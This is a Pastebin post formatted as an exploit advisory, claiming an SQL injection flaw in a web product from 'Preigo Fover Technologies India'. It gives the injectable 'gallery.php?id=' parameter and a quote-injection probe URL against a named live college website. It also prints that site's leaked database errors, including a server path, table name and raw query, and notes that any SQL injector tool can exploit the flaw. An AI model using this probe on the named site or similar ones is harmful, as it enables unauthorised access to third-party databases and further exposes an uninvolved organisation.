KingSkrupellos

Preigo Fover Technologies India SQL Injection

Mar 7th, 2019
93
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.58 KB | None | 0 0
  1. ####################################################################
  2.  
  3. # Exploit Title : Preigo Fover Technologies India SQL Injection
  4. # Author [ Discovered By ] : KingSkrupellos
  5. # Team : Cyberizm Digital Security Army
  6. # Date : 08/03/2019
  7. # Vendor Homepage : preigo.com
  8. # Tested On : Windows and Linux
  9. # Category : WebApps
  10. # Exploit Risk : Medium
  11. # Vulnerability Type : CWE-89 [ Improper Neutralization of
  12. Special Elements used in an SQL Command ('SQL Injection') ]
  13. # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
  14. # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
  15. # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
  16.  
  17. ####################################################################
  18.  
  19. # Impact :
  20. ***********
  21. Preigo Fover Technologies India is prone to an SQL-injection vulnerability because it fails to sufficiently
  22.  
  23. sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow
  24.  
  25. an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities
  26.  
  27. in the underlying database. A remote attacker can send a specially crafted request to the vulnerable
  28.  
  29. application and execute arbitrary SQL commands in application`s database. Further exploitation
  30.  
  31. of this vulnerability may result in unauthorized data manipulation.
  32.  
  33. An attacker can exploit this issue using a browser or with any SQL Injector Tool.
  34.  
  35. ####################################################################
  36.  
  37. # SQL Injection Exploit :
  38. **********************
  39. /gallery.php?id=[SQL Injection]
  40.  
  41. ####################################################################
  42.  
  43. # Example Vulnerable Sites :
  44. *************************
  45. [+] emmanuelbedcollege.ac.in/gallery.php?id=5%27
  46.  
  47. ####################################################################
  48.  
  49. # Example SQL Database Error :
  50. ****************************
  51. Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean
  52. given in /home/emma0812/public_html/gallery.php on line 39
  53.  
  54. Error: You have an error in your SQL syntax; check the manual that corresponds
  55. to your MySQL server version for the right syntax to use near ''5''' at line 1
  56. Error No:You have an error in your SQL syntax; check the manual that corresponds
  57. to your MySQL server version for the right syntax to use near ''5''' at line 1
  58. select * from emc_photo_category where img_cat_id='5''
  59.  
  60. ####################################################################
  61.  
  62. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
  63.  
  64. ####################################################################
Add Comment
Please, Sign In to add comment